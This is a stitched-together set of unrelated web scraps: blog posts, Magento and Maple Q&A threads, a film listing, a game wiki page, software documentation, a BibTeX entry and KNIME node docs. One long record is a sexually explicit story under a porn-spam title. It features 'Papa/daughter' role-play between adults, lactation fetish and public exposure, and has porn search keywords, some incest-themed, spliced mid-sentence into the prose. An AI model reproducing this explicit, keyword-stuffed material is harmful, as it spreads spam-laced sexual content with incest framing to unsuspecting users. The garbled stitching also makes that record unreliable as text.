January was 74,466,000 barrels per day, eclipsing the heretofore peak of May 2005 by 168,000 barrels per day. (thanks to Ron Patterson for the heads up and to Khebab for the quick graphics). Anyone who tells you that there's a crude oil shortage as of 2008 is full of crap. There may be an oil shortage in 2009, or 2010. But there is no shortage of petro as of 2008. Why young feminists are supporting Obama. As the media noted (perhaps correctly) that by remaining in the race Clinton might be jeopardizing a Democratic White House for four more years, Obama stood up to say that Clinton has every right to remain in the race. How easy it would have been for Obama, even coyly, to have egged on the calls for Clinton's withdrawal. In fact, he came to her defense, showing both a difference in style and principle. Ironically, it was the male candidate rather than the female who exhibited one of the values of feminism, the unwillingness to accept the old style politics played by men for decades. This pattern of old-style politics and adherence to un-feminist values is part and parcel of the campaign Hillary Clinton has run - let us also not forget her old pal James Carville calling Bill Richardson "a Judas" for endorsing Obama. The Clinton pattern is why most of the young women I know on my all-women's campus and elsewhere are supporting Barack Obama. I've ranted many times that "feminism" has become so diluted, so individualized, that the term itself doesn't actually mean anything specific any more. I see the above attitude as being far more about supporting fundamental change,1 rather than being about liberation and equality for women. But I'm still happy to see people supporting Obama, whatever their reasons. 1 Something which I believe is impossible in the USA of today.
global_01_local_0_shard_00002368_processed.jsonl/41023
We have a custom CMS type page that is added from the Category settings. Created at /neon-signs/custom-neon-signs.html Under that category setting, we set the URL Key and then also assign a CMS Block to show at that URL. Now under our CMS Block settings we have... {{block type="core/template" template="avenirgallery/custon_neon_sign_form.phtml"}} This lets us build our CMS page from this .phtml file Now we are facing a new challenge. In this page we will have a keyword like Custom, Personalized, etc... What we would like to do is replace this keyword everywhere in the page, based on the URL. So we can send traffic to different versions of the page and that keyword will be replaced. Now I am able to do this with a URL like this with no problem... /neon-signs/custom-neon-signs.html?keyword=Custom and then I can replace the keyword in the document using $_GET['keyword'] Now our issue is the Page Title. Right now our CMS Block has a title set like this Custom Neon Signs Since the Title is set in the Admin Panel for the CMS Block, there is no way for me to change it to be the value set in the URL /neon-signs/custom-neon-signs.html?keyword=Custom So that is where my real question is... How can I Dynamically set the CMS Block's Title from code and have it over-ride the admin Panel setting for the CMS Block Title? I hope there is a way? Another bonus question would be, is there any way to have a more pretty URL to utilize our keyword in the URL? I am thinking, since the URL key is set in the Category setting, that it would be hard to change the URL's and I am better off just using my current method for now? Thanks for any help in the matter. I really need to be able to dynamicly set the CMS Block Title from my .phtml file or some other way to have it take in the value from $_GET['keyword'] and apply it to part of the title? You can change the page title from a block class. This would probably be the easiest in this case. Create a custom extension and add a Block class by creating the file app/code/(community|local)/[Namespace]/Avenirgallery/Block/Form.php Now set this class as the type in the tag discribed above {{block type="avenirgallery/form" template="avenirgallery/custon_neon_sign_form.phtml"}} Now in the block class which would be [Namespace]_Avenirgallery_Block_Form class [Namespace]_Avenirgallery_Block_Form extends Mage_Core_Block_Template protected function _prepareLayout() $head = $this->getLayout()->getBlock('head'); $head->setTitle( Mage::app()->getRequest()->getParam('keyword') ); return parent::_prepareLayout(); • Thanks a lot, this should work great as this is already an Extensions so should be easy to add in. In fact there is already 1-2 files in my app/code/local/Avenir/Avenirgallery/Block/ folder. A simple question... Form.php is there a reason for this name? Can it be any name? Just trying to learn more about the reasoning or if it doesn't matter? Thanks a bunch for the help in my journey to learn Magento – JasonDavis Dec 13 '13 at 13:37 • Any name will be good but generally you will make the path and name of the Block class the same as the PHTML file. So [...]/templates/avenirgallery/form.phtml should have a block class file [Module]/Block/form.php Please don't use underscores in the classes filename since Magento will resolve this to slashes – Sander Mangel Dec 13 '13 at 13:41 • Great thanks. I am having some issues getting this to work. After doing everything mentioned above, my page loads just fine but it will not change the title no matter what I do. I even set the title like this for testing $head->setTitle( 'My title' ); with no luck. I was then looking at my Extensions /etc/config.xml file and saw that there was an existing Block that is set in this config file so it got me thinking that perhaps I need to add this new Block to that file as well? – JasonDavis Dec 13 '13 at 14:05 • <blocks> <avenirgallery> <class>Avenir_Avenirgallery_Block</class> </avenirgallery> <form> <class>Avenir_Avenirgallery_Block</class> </form> </blocks> – JasonDavis Dec 13 '13 at 14:06 • Formatting is messed up but basically I copied the same way the other block was in this config file and did it for this one. Still no luck though on the desired result. Any ideas what I might be missing? Appreciate your time! – JasonDavis Dec 13 '13 at 14:07 Your Answer
global_01_local_0_shard_00002368_processed.jsonl/41024
I changed the version of PHP [5.6.30] to PHP [7.0.17]. But now Magento returns the following error: I tried the following solutions: 1. https://gist.github.com/MageMechanic/66449504110fbbd96214 2. http://afilina.com/magento-1-9-on-php7/ But the error is still there. Try to restart mysql0. Looks like your sql has stopped. • I posted the answer in comment above. – Jai May 10 '17 at 11:30 • 1 Ok great, sorry didn't see it @Jai – Ledian Hymetllari May 10 '17 at 11:37 Your Answer
global_01_local_0_shard_00002368_processed.jsonl/41025
Rêves de jeunesse 1 hr 32 min Not recommended for under 10 years. Available subtitles Salomé lands a summer job in the junkyard of a village in Southern France. In this timeless place, her rebellious adolescence catches up with her. She meets friends, old and new, who all share the same desire to build a way of life far from any social order. Directed by: Alain Raoust (France, 2019) Cast: Salomé Richard (Salomé), Yoann Zimmer (Clément), Estelle Meyer (Jessica), Jacques Bonnaffé (the man on a bike), Christine Citti (the mother), Aude Briant (Salomé's manager), Carl Malapa (Kevin), Iliana Zabeth (Aline), Paul Spera (Julien), Eberhard Meinzolt (the father), Théo Cholbi (Mathis) Genre: comedy Parental guidance: TV-PG
global_01_local_0_shard_00002368_processed.jsonl/41032
This weekend Marc Geller of Plug In America and I were interviewed by Nikki Bloomfield for EVCast, a biweekly podcast about Electric Vehicles. Host Nikki Bloomfield is joined by lifelong educator Chris Connors from MAKE Magazine and Marc Geller, EV advocate and blogger from Plug in America. They discuss encouraging young people into the world of EVs through education, hands on experiments and workshops. A few of the things we talked about were helping kids get excited about Electric Vehicles, resources for EV information, education resources for teachers, next week’s Maker Faire, and the Electric Vehicles Flickr pool. Good books we talked about EVs included Solo by Noel Perrin, Electric Dreams by Caroline Kettlewell and Build your own Electric Vehicle by Bob Brandt and The Adventures of Ellie the Electric Car by Julia Ammons. You can listen to the show or if you fill out the free registration, you can download the mp3 file. Nikki has also edited the file down and it is on her site. digg_url = ‘http://digg.com/environment/EVCast_Get_kids_excited_about_Electric_Vehicles’;
global_01_local_0_shard_00002368_processed.jsonl/41033
Facebook is the 10,000 pound canary in the coal mine Tom Merritt of APR’s Marketplace on NPR Morning Edition, Daily Tech News uttered this one.  One of the criteria for a malaphor is that it is unintentionally said; a mental mishap so to speak.  However, I have made an exception with this one as it is very clever.  It appears Mr. Merritt was saying this intentionally, as he was talking about Facebook policing its advertising, and whether the latest transparency move was significant. They don’t want to talk about it; they’re being forced to talk about it. We don’t have a clear way of knowing whether our privacy is being protected.. It is a mashup of “canary in a coal mine” (early warning of possible adverse conditions or danger), “the 800 pound gorilla” (a person or group so powerful it does not need to heed to the rules) and “the elephant in the room” (a problem that everyone is aware but choose to ignore and not mention).  Elephants, gorillas, and canaries all in one phrase!  A huge thanks to Sally Adler for hearing this one and passing it on!
global_01_local_0_shard_00002368_processed.jsonl/41040
Question: Solving ODE with Maple and by hand I have just noticed that solving a nonhomogeneous linear ode using maple dsolve gives a different solution when compared to hand calculation by method of undetermined coefficient. For instance, this equation equation is   has the solution Using dsolve for the same function give something completely different. Any assistance on how I can resolve this will be highly appreciated Please Wait...
global_01_local_0_shard_00002368_processed.jsonl/41041
The Retired Inventor From MapleStory 2 Wiki Jump to: navigation, search The Retired Inventor Level 50 Type Solo Starts with Maccan Starts at Barbosa Beach Start Area Ellinia Ends with Navue Ends at Tidepool Cliffs End Area Ellinia Quest Chain Into the Desert Walkthrough & Notes[edit | edit source] Navue is the engineer who helped build the Lumiwind with Maccan. He's the only one who can repair the ship, but he recently retired to Tidepool Cliffs. Rewards[edit | edit source] • 7,000 Mesos 665,878 Experience  Bestowal Dialogue[edit | edit source] Doc Maccan: Navue is my partner in crime. The Lumiwind would still be a pipe dream without his engineering genius. But he ditched me a while ago, accused us of wasting our time. The nerve! >What made him change his mind? Doc Maccan: Well... A lot of newer tech makes the Lumiwind a tiny bit obsolete. Sure, our ship doesn't have an onboard computer or internal combustion or seat belts, but it's our dream! Doesn't that count for something? >So, you need Navue to make this thing fly again... Doc Maccan: Well, yeah. He's a genius, but a stubborn genius. If you can convince him to help out, then I'll take you wherever you want to go. >Where can I find him? Doc Maccan: He didn't go far. I heard he just bought a house in Tidepool Cliffs. Quest Completion Dialogue[edit | edit source] Navue: What do you want? >I need your help fixing the Lumiwind. Navue: Oh? I shoulda known that fool Maccan would break her... Objective[edit | edit source] • Find Navue at Tidepool Cliffs
global_01_local_0_shard_00002368_processed.jsonl/41043
Component Migration This section describes how to migrate customized components to MapR Hadoop. MapR Hadoop features the complete Hadoop distribution including components such as Hive. There are a few things to know about migrating Hive, or about migrating custom components you have patched yourself. Custom Components If you have applied your own patches to a component and wish to continue to use that customized component with the MapR distribution, you should keep the following considerations in mind: • MapR libraries: All Hadoop components must point to MapR for the Hadoop libraries. Change any absolute paths. Do not hardcode hdfs:// or maprfs:// into your applications. This is also true of Hadoop ecosystem components that are not included in the MapR Hadoop distribution (such as Cascading). For more information see Working with MapR Filesystem. • Component compatibility: Before you commit to the migration of a customized component (for example, customized HBase), check the MapR release notes to see if MapR Technologies has issued a patch that satisfies your business requirements. MapR Technologies publishes a list of Hadoop common patches and MapR patches with each release and makes those patches available for our customers to take, build, and deploy. • ZooKeeper coordination service: Certain components depend on ZooKeeper. When you migrate your customized component from the HDFS cluster to the MapR cluster, make sure it points correctly to the MapR ZooKeeper service.
global_01_local_0_shard_00002368_processed.jsonl/41044
Big Data SQL: Overview of Apache Drill Query Execution Capabilities In this Whiteboard Walkthrough, Neeraja Rentachintala, Senior Director of Product Management at MapR Technologies, gives an overview of how open source Apache Drill achieves low latency for interactive SQL queries carried out on large datasets. With Drill, you can use familiar ANSI SQL BI tools, such as Tableau or MicroStrategy, plus do exploration directly on big data. For additional material: 1. Apache Drill 1.6 and the MapR Converged Data Platform – The Emergence of a New Generation Stack for ‘JSON-Enabled Big Data Analytics 2. SQL Query on Mixed Schema Date Using Apache Drill 3. Apache Drill sandbox
global_01_local_0_shard_00002368_processed.jsonl/41053
InContext  ☑ InContext is one of a small number of SGML editors more suited to data applications, with the interface using boxes for each element (see Figure 6, “InContext editing a CALS manual”). Navigation is provided in a side-panel, using a 3D arrangement of stacked, nested buttons to represent the document tree. This is a good way to display documents where data elements occur frequently and text is minimal, but its usability as an editor for writing continuous text is severely limited. As the only available disk was an evaluation copy, it was not possible to open the sample document, only the samples provided by the vendor. Microsoft Office (specifically, Excel, to handle tables) must be installed before installing InContext. Figure 6. InContext editing a CALS manual InContext editing a CALS manual Access to editing in Mixed Content is possible, despite the box design: selecting an element type like para lets you split the content into nodes, and empty elements are shown as symbols. Other software with a related interface includes Microsoft Office InfoPath (2003), and the Citec’s MultiDoc Pro Translating Editor
global_01_local_0_shard_00002368_processed.jsonl/41065
@article {Wenzele00802-18, author = {Wenzel, Michaela and Rautenbach, Marina and Vosloo, J. Arnold and Siersma, Tjalling and Aisenbrey, Christopher H. M. and Zaitseva, Ekaterina and Laubscher, Wikus E. and van Rensburg, Wilma and Behrends, Jan C. and Bechinger, Burkhard and Hamoen, Leendert W.}, editor = {Haagsman, Henk P. and Kline, Kimberly A.}, title = {The Multifaceted Antibacterial Mechanisms of the Pioneering Peptide Antibiotics Tyrocidine and Gramicidin S}, volume = {9}, number = {5}, elocation-id = {e00802-18}, year = {2018}, doi = {10.1128/mBio.00802-18}, publisher = {American Society for Microbiology}, abstract = {Cyclic β-sheet decapeptides from the tyrocidine group and the homologous gramicidin S were the first commercially used antibiotics, yet it remains unclear exactly how they kill bacteria. We investigated their mode of action using a bacterial cytological profiling approach. Tyrocidines form defined ion-conducting pores, induce lipid phase separation, and strongly reduce membrane fluidity, resulting in delocalization of a broad range of peripheral and integral membrane proteins. Interestingly, they also cause DNA damage and interfere with DNA-binding proteins. Despite sharing 50\% sequence identity with tyrocidines, gramicidin S causes only mild lipid demixing with minor effects on membrane fluidity and permeability. Gramicidin S delocalizes peripheral membrane proteins involved in cell division and cell envelope synthesis but does not affect integral membrane proteins or DNA. Our results shed a new light on the multifaceted antibacterial mechanisms of these antibiotics and explain why resistance to them is virtually nonexistent.IMPORTANCE Cyclic β-sheet decapeptides, such as tyrocidines and gramicidin S, were among the first antibiotics in clinical application. Although they have been used for such a long time, there is virtually no resistance to them, which has led to a renewed interest in this peptide class. Both tyrocidines and gramicidin S are thought to disrupt the bacterial membrane. However, this knowledge is mainly derived from in vitro studies, and there is surprisingly little knowledge about how these long-established antibiotics kill bacteria. Our results shed new light on the antibacterial mechanism of β-sheet peptide antibiotics and explain why they are still so effective and why there is so little resistance to them.}, URL = {https://mbio.asm.org/content/9/5/e00802-18}, eprint = {https://mbio.asm.org/content/9/5/e00802-18.full.pdf}, journal = {mBio} }
global_01_local_0_shard_00002368_processed.jsonl/41112
Name This Place 13.4.3 Please read The Rules of the contest and Name This Place: Categories: Contest 11 replies 1. Tabernacle at North Carrollton • I will accept that identification of “Tabernacle” since the building type is so rare (Carrollton does not have two tabernacles to get mistaken for each other), but it could be identified more specifically. One point. 2. Style: Methodist al fresco Agrarian Ecclesiastical Liked by 2 people 3. Grand Gulf Military Park, Port Gibson, MS 4. I was identified as early as 1926 in the Greenwood Commonwealth, and a 1929 article referenced its construction on the Big Sand Creek bank between North Carrollton and Carrollton. 5. The deed for the lot on which to erect the tabernacle was secured 1922 (Jackson Daily News, 18 Step 1922, p. 5). 6. This past fall a 50th anniversary showing of The Rievers was held in the tabernacle. The movie was filmed in Carrollton. Liked by 1 person Leave a Reply You are commenting using your account. Log Out /  Change ) Google photo Twitter picture Facebook photo Connecting to %s %d bloggers like this:
global_01_local_0_shard_00002368_processed.jsonl/41113
Playing with a concupiscent japanese cum hole hardcore groupsex Playing with a concupiscent japanese cum hole hardcore groupsex 857 Likes 823 Viewed Distance was their enemy. They had met online by chance and fallen in love with each other's mind and wants. They would satisfy each other daily bringing joy to the day-to-day mundanity. One day they decided to meet face to face and he came to visit her where she lived. They were such an odd couple to the unsuspecting eye, only they knew how well they connected and complemented each other. He was 63 and she was 21 when they met. They continued seeing each other along that year and finally decided to ignore society and its rules and live together. It was not necessary to marry; for them, their bond was enough. People did not agree, they did not understand what was going on between them, but they were happy and oblivious to what people thought. What they saw was an old white man with a young black girl; you could not get it any worst than that. He was always a passionate lover and knowing her, allowed her to explore outside their relationship, encouraging her too explore her sexuality with other men and women. He didn't try to restrict her; he understood her need to be free while she embraced the wonders of sex. Their pact was easy, before getting pregnant the only seed that would spill inside her would be his, after that the last man to come inside her every night would be him. She wanted his seed so they could get pregnant. She wanted his child in her womb. Soon after moving together, they found out she was having their babies She called him Papa and he called her daughter, people would stare at them on the street when they walked together holding hands, her belly full with their children. They were twins a baby girl and a baby boy. When the twins were born, she wanted to explore more and he agreed. The doctor had told them that she could resume sexual relations and they were ecstatic. It had been a difficult birth and three months had passed since the last time they had slept together. That night they had sex slow and unhurried, both paying homage to their bodies. She woke up early to feed the twins and then, she returned to bed to sleep for a while longer. When she next awoke, the babies were sound asleep, not waking up for their next feeding and her breasts were hurting because of the fullness of them. As her mother she produce large amounts of milk, when she was a baby her mom used to breastfeed her and her neighbor, and still have milk to save up while she was working. She didn't have any one else to breastfeed but the twins so she turn to Papa when her breast where too full and the twins were not hungry. She woke up her 38DD breast leaking profusely having stained her nightgown. She went to her babies and they were still asleep, not wanting to wake them up, she came back to the room to find Papa sleeping. She got into bed besides him and shook him awake… "What is it daughter?" "Papa your twins are asleep and my breasts are hurting, they are too full." she told her with a whining voice. "Suck my tits Papa, please" He pushed himself up and sat down, he could see how her nipples where hard, and seeping the whitish liquid, her nightgown wet. He put the pillows he was using, on her lap and accommodated himself so he could feed from her tits. When he laid down to take his "early breakfast" She took her tits out of her nightgown, her light brown globes full, her pink nipples fully engorged and begging to be suckled. He brought his tongue to her left nipple and he could feel her body relax, and feld her sigh when he started sucking. He was immediately rewarded with warm sweet milk, and he felt how her tit gushed milk to his wanting mouth. Soon, as it always happened, she started shaking, the pulls from his mouth making her pussy contract. She moaned quietly, as he suckled and feast from his "daughter's" breast. He knew how much she loved nursing him, before they had their babies, she had always encourage him to suck her tits so he could bring milk out of them. He had awoken hard, and now her milk, her nipples in his mouth and her quiet moans had him painfully hard. As if she could read his mind, she reached out, took his hard on from his pj pants, and started stroking him. He moaned as he felt her warm hand running the length of his thick 7'inch cock. He liked teasing her by shortly stop sucking and just tickling her sensitive nubbin with his tongue. He heard her gasp as he did this and felt her hand reach between her legs. Soon he had empty that tit and switch to the other, suckling and feasting from her right tit. She was panting now, playing with her clit underneath the pillows, her earthy and unique scent filling his nostrils and taking him to the point of no return. Soon they were both coming, her tit gushing milk to his mouth, the milk spilling out and trickling to his chin, and his own cum mimicking the milk from her bosom, spilling out his throbbing cock. She had asked him to take her out for breakfast today and a little adventure if it was possible. As always he happily oblige after making sure their twins were bathed, and fed, they left them with their nanny and left to town. When they were on their "adventures", he would ask of her to dress like a little girl, and wear no underwear, usually little skimpy dresses that left nothing to the imagination with her lush figure. She had large breast, wide hips and a round ass, she was 5'3, her body, lush and after having a baby, as curvy as ever. That morning she wore a white dress with little straps on her shoulders. The dress did not have much cleavage but her large tits looked like they wanted to spill out from the top. It was not too short, a little above her knees, and it fitted a little loose, around her hips and ass. The fabric was a little transparent, and without her wearing any underwear, you could see through and admire her tits and smooth mound. To finish it she wore her medium length, light brown hair in elaina raye and diana doll sharing bf in the bedroom pony tail, and wore no jewelry or make up. How ever saw her would think lesbian teen cam girls show on camscom in public was barely 18 years old. Just what Papa wanted. They went in the dinner hand in hand, sat down in a booth and waited to be served. A young waiter came to their table and took their order. Papa saw how Angela looked at the man, he was in his 20's, good looking with black hair and blue eyes, tall and lean. "Baby do you want him for our adventure?" "Yes Papa, I think he will do just nice." The waiter came back with their breakfast, and could not help but stare at Angela's full breasts. She smiled without looking up, murmuring her thanks when he said bon appétit. When they were eating the waiter kept waking around their table, making sure everything was all right and taking the opportunity to check Angela out. Papa asked Angela to go to the bathroom. "Yes Papa" She knew exactly why he had asked, he wanted the boy to see her beautiful body, and he certainly did. He gasped a little when he realized she was wearing no underwear, and his eyes slowly took inventory of the woman walking by his side. He stayed outside the bathroom, making sure she had to pass by him again. When she came out, she saw him and went to him. "Could you bring my Papa a glass of water?" "Uhhh yes of course" She could see the mind of the guy working out the piece of information she just dropped him. She was with her "Papa". He took a while getting the water, still trying to understand what he had just heard. When he was approaching their table he heard her say. "Papa I'm starting to wet my dress, you are going to have to do something" He when he got closer he saw "Papa" take out his daughters left tit out of her dress and dutifully started sucking, right there in public. This girl was nursing the man, he could see how the other tit had started wetting her dress, making the fabric fully transparent and bearing her pink nipple. The waiter just stood there watching as the man kept sucking the girl's naked tit and she sat there with her head thrown back, eyes closed, and mouth slightly open. He first felt sick but that feeling was quickly replaced by undeniable lust. He felt his cock coming to life inside his pants. She notice he was standing there and opened her eyes and smiled. "I hope you don't mind but I'm nursing, and I produce to much milk for my twins, so my Papa takes care of the extra milk". Papa stopped sucking Angela's tit to address the boy, "Would you like to help out…the place is empty, we are the only costumers right now…take a short coffee break…or better said, milk break" They say how the waiter hesitated and suddenly he sat down besides Angela and took her right breast out. He started sucking right away being rewarded but warm sweet milk from her full tit, this was every man's fantasy; he never thought his Sunday could start like this. Angela caressed, Papa's and the boys face as they emptied her tits. When they finished, she thanked them both with a kiss on the mouth and calmly put her tits back in her dress. overwatch mercy hard fuck anal animation pov play free will your shift finish…?" The waiter agreed to met Papa and Angela in a motel near the dinner. She asked him to bring a friend if he wanted. They were waiting in the room when they heard the knock and Papa went to open the door. The boy had come with a friend, he seemed about the same age as him, but a little shorter, and stockier, he had brown hair, and brown eyes. He was a little darker than his friend, and he was attractive too. "Uhh hello, this my friend Jake" said the waiter "Nice to meet you Jake" Angela came to give Jake her hand, and then addressed the waiter "You didn't told us your name" "Bobby, you can call me Bobby" "Good Bobby, be kind and come so I can close the door," said Papa "I'm Sebastian and this is my daughter Angela" "Uh sir…how come you were…uh…sucking your daughter's tits earlier" Angela chuckled, "He is my Papa by all definition…but not in blood, he's my partner in life and my Son's father, he's my Papa" The boys seemed to understand the information. If they didn't, Angela did not care, she just wanted to fuck them not to engage a conversation with them. "Well boys don't be shy, and take of your clothes; you didn't come here to hear our life's story now did you?" Slowly the boys undressed, visibly uncomfortable as Papa sat down in a couch near the king side bed. "Papa likes to watch, but he won't be joining us" She went to Papa's lap and kissed him softly on the mouth. Papa began mofos i know that girl skinny squirting s her, letting the straps of her dress slide pass her shoulders so that her dress came to rest on her waist. When the boys saw her full tits their cocks began growing visible in their underwear. She stood up and came to them and slowly took off their underpants. They were now standing naked in front of her, as she was naked in front of them, her dress falling down to the floor. She looked at their hungry eyes take in all of her, her full and firm tits, her slightly full belly, her smooth bald pussy, her shapely legs. "You can touch if you want" At this Bobby and Jake reached out to touch her tits, first gently massaging them, then they started to pinch her nipples and flick and play with them, soon her nipples started glistening with milk, Jake took a bold move and brought his tongue to her nipples, licking and tasting her milk. They both then started licking her tits, running their tongues all over. She brought Bobby's face up to kiss him passionately as Jake continued to lick and suckle her tits. Bobby brought his hand down to cup her mound and then started playing with her clit. She moaned against his mouth and opened her legs to give him better access. Her hands came to rest in both their cocks and she started stroking them, as she felt Jake's mouth on her tits and Bobby's hand on her pussy. Bobby was the larger of the two, she figured he had to be 8 inches long, but not quit thick as Papa. Jake on the other hand was xxnxx sister and badruoom zabardasti com 6 and half inches, and thicker than Papa. She began jerking them off, as she felt Bobby's finger slide in inside her wet hole, she started humping his hand, getting very aroused by the touch of this two boys. She stopped jerking them off and asked them to lay in bed. They did as told and laid between them, kissing both on their mouths and them trailing kisses to meet their throbbing cocks. She brought Jakes cock first and sucked it and felt how he grew in her mouth she, moaned as she felt Bobby's finger getting close to her asshole. She kept sucking Jake for a while, as Bobby, started kissing ass, and them licking around her asshole. She was moaning and making Jake harder in her mouth. Soon Jake started cuming in her mouth his loads being swallowed up eagerly by Angela. Jake remained hard, so she sucked him a little longer to get him harder and then she told him to stick his cock in her wanting pussy. She got in all fours and asked Jake to place himself behind her and Bobby in front of her. She started sucking Bobby, and Jake impaled his cock in her hot pussy. He started with a slow rhythm at first, letting Angela suck Bobby's cock to her pleasure. As she sucked Bobby's cock she paused to look over at Papa jerking off in his seat. Cute babe has fun with his cock She bobbed her head up and down Bobby's shaft as Jake started pumping harder inside her, she felt Bobby's cock tighten and she stopped sucking him and started jerking him off quickly and wanting Bobby to cum in her mouth and face. When Bobby sarted cuming he took hold of her head and thrust himself roughly making her gag on his cock and cum but she rapidly swallowed and cleaned his cock. Bobby laid down on the bed waiting to get hard again as Jake kept pumping Angela's pussy. He was fucking cumming between big tits my wife janine hard and soon she was moaning, her eyes closed taking all in, she felt a tounge flick around her aerolas and her nipples and milk starting coming out, Bobby started sucking her titts hard and she started cumming, her orgasm making her milk Jakes cock her cunt contracting, and making Jake cum along with her. He released his cum load inside her hole their juices mingling and then he pulled out. They both dropped on the bed her juices and his cum wetting the bed. She didn't get a chance to breath when Bobby was ready again, and flipped her over and put her legs over his shoulders. He entered her easily, her pussy already wet with her juices and Jakes cum. Bobby got his mom m and son xxx cock in her and started pumping and grinding her soon they got to a rhythm. Jake was jerking off mean while and when he was half hard, he put his cock inside Angela's mouth again. She sucked him tasting her cum in her cock. He soon was rock hard again and ready for another round. He asked Bobby to lift her up so he could slide in below her. He then took two fingers to her cunt hole and ran his wet fingers along her asshole. He trusted inside her cunt to get his cock well lub and then without any notice started stretching Angela's asshole. She started moaning loudly as she felt his thick cock streck her tight hole. When he was all slutty lesbian honeys are spreading and fisting buttholes, Bobby, pushed himself back in her cunt. They Bobby started pumping hard, and Angela came again with Jake impaled all the way up her ass and Bobby pumping inside her. When she came back from her high, Jake started moving as well, both boys finding a rhythm that had Angela screaming and thrashing soon. Jake took hold of her tits and massaged them as Bobby started sucking her nipples again. She came again with her two holes filled, her pussy and asshole contracting around both cocks. They kept fucking her like this for three hours or so each taking turns to cum inside her asshole and her cunt. The whole time she kept looking at Papa, focusing in him, as he pleasured himself with his hand. When the boys were spent, they got dressed and said their goodbyes. Angela was exhausted and promptly fell asleep. She woke up to the feeling of a warm tongue inside her pussy. Papa was cleaning the boys' mess, lapping up her juices mixed with both boys' cum. She felt relaxed against his mouth and realized they were home again. Papa had carried her to the car covered up in a blanket and brought her back home. He cleaned her pussy and asshole and then stood up and told her to take a bath. When she came out he was holding the twins and she sat down naked to breastfeed them. After the babies were fed, Papa took him them to their crib and came back in the room. Hug ass black grandmothe pussy squirting He slowly undressed and got in bed besides her. She kissed him passionately and then she laid her head down on his chest "Thank you for today" He kissed her head and then lift her up and made her straddle him. She found his cock standing hard waiting to be surrounded by her hot pussy. She sat down on top of his cock taking inch by inch until he was fully inside her. Then she started moving slowly grinding his cock, loving how he touched the walls of her pussy. Papa started playing with her nipples pinching them hard, as he knew she liked, making milk come out and wet his chest. "Daughter today you were magnificent, you are so beautiful…" "ohhh Papa, I love it when we have sex like this, after an adventure" Papa then put her on bed, and came on top of her, pushing himself inside her cunt again. This time his thrust became harder and soon Angela was moaning and calling his name, french arab slut desperate arab woman fucks for money Papa yes make me cum, make your little girl cum". He leaned down to kiss her never stopping his trusts, and her milk heavy tits wetted his chest with milk. He started pumping hard as she met his every thrust and he groaned as he came inside her, spilled his cum inside her cunt. They fell asleep like this, with him inside her her warmness for ever surrounding him.
global_01_local_0_shard_00002368_processed.jsonl/41178
Seeking Fun Exercise: Zumba! I’m one of those people who hate working out. I just can’t do it for the satisfaction of doing it- I have to be entertained while I sweat. Sometimes that takes the simple form of a new playlist, or I bring Netflix to the elliptical, but occasionally an opportunity to try something a little more fun comes up… and this weekend, that was Zumba. On Saturday night I received a text from my friend J inviting me to a charity Zumbathon put on by one of her sorority sisters. The event benefited Girls on the Run, a nonprofit that matches girls with mentors that teach them life skills through running. I had never heard of it before but I loved the message they sent! The money raised benefited the Rhode Island chapter of Girls on the Run. I had never done Zumba before, but was eager to try. I was a little nervous about the fact that I haven’t worked out since my accident, and I’m uncoordinated anyway, but it turns out I had nothing to worry about. We broke up into three rows and we danced! It didn’t matter at all that I missed some steps or spun the opposite way- we were all too busy having fun to notice. Seriously, for the first few songs we were laughing the whole time! At the end of the class, the instructor said we had burned about 600-1000 calories in one session. And I believe it- I’m sure I lost a pound in sweat alone. I would definitely reccomend this. I’d like to look into Zumba classes in my area and go back- once my muscles stop being so sore! Have you ever taken a new class and loved it? What did you try? Let me know in the comments! Leave a Reply You are commenting using your account. Log Out /  Change ) Google photo Twitter picture Facebook photo Connecting to %s
global_01_local_0_shard_00002368_processed.jsonl/41227
Simon Sinek February 5, 2017 Simon Sinek Video Summary: Why Leaders Eat Last In this video Simon Sinek asks the question… Why is it that people in the military are willing to sacrifice themselves for others, while most people… February 16, 2016 Simon Sinek: Start With WHY Simon Sinek is one of the leading speakers and thought leaders on the topic of Leadership. This video is his famous TED Talk where he introduces…
global_01_local_0_shard_00002368_processed.jsonl/41231
0 × Row Splitter (col+) StreamableGeneric Nodes - Node extension for KNIME Workbench provided by Lhasa Limited version 1.2.100.v202001171846 by Lhasa Limited The node allows for row splitting according to certain criteria. It can include or exclude: certain ranges (by row number), rows with a certain row ID, and rows with a certain value in a the selected columns (attribute). The RowFilter node has been adapted to allow for multiple column selection to perform the attribute matching (include and exclude). It is possible to match based on a single column match (only one must return true) or every column match (all must return true). Example usage: String column with numbers, int column and a double column. Using the pattern 1 will return matches for "1" in the int column and the String column however will not match the double column. To match the value '1' on a double column the pattern needs to be '1.0'. If you want the same match to work accross these three columns then you can use the regex: '(1|1\.0)' (no quotes) which makes the '.0' optional. Range filtering on mixed column types is not recommended. It is best to use all Int columns, all Double columns or all String columns etc. Although filtering on Strings will likely give unexpected results. Include or exlcude Include rows when a positive match occurs will add the true matches to the first output. Exclude provides the reverse functionality. Column value matching Select the columns to be used in the matching. The configured matching criteria will be checked against each selected column. Match all If true (match all) then each column must be match the given criteria to be a positive match. Otherwise only a single column must match. Example behaviour: with excluding values when Match all is selected all columns must contain the filter criteria for the row to be excluded. When this option is not selected the row will be excluded if any column contains the match criteria. The same behaviour is seen for missing values, when selecting Match all every column must have a missing value for that, if only some or none the row will not be excluded. Match criteria Either enter a pattern for string matching, or a value range, for range filtering. When using a pattern match, you can set checkmarks according to whether the pattern contains wildcards or is a regular expression. Wildcard patterns contain '*' (matching any sequence of characters) and '?' (matching any one character). Examples of regular expressions are given below. Also, a case sensitive match can be enabled by the according checkmark. Note: if you select a pattern from the drop-down menu of the pattern text field, the node still performs a comparison of the string representation of the data values. If a range is specified, and you specify only one boundary, the other is then set to (plus or minus) infinity. Here are some examples of regular expressions:"^foo.*" matches anything that starts with "foo". The '^'-character stands for the beginning of the word, the dot matches any (one) character, and the asterisk allows any number (including zero) of the previous character. "[0-9]*" matches any string of digits (including the empty string). The [ ] define a set of characters (they could be added individually like [0123456789], or by range). This set matches any (one) character included in the set. For a complete explanation of regular expressions see e.g. the JavaDoc of the java.util.regex.Pattern class. Row number range If filter by range is selected, specify the first row number to in/exclude. The end of the range can either be specified by row number, or set to the end of the table, causing all remaining rows to be in/excluded. Input Ports Datatable from which to filter rows. Output Ports Datatable with rows meeting the specified criteria Datatable with rows not meeting the specified criteria Best Friends (Incoming) Best Friends (Outgoing) To use this node in KNIME, install Lhasa public plugin from the following update site:
global_01_local_0_shard_00002368_processed.jsonl/41236
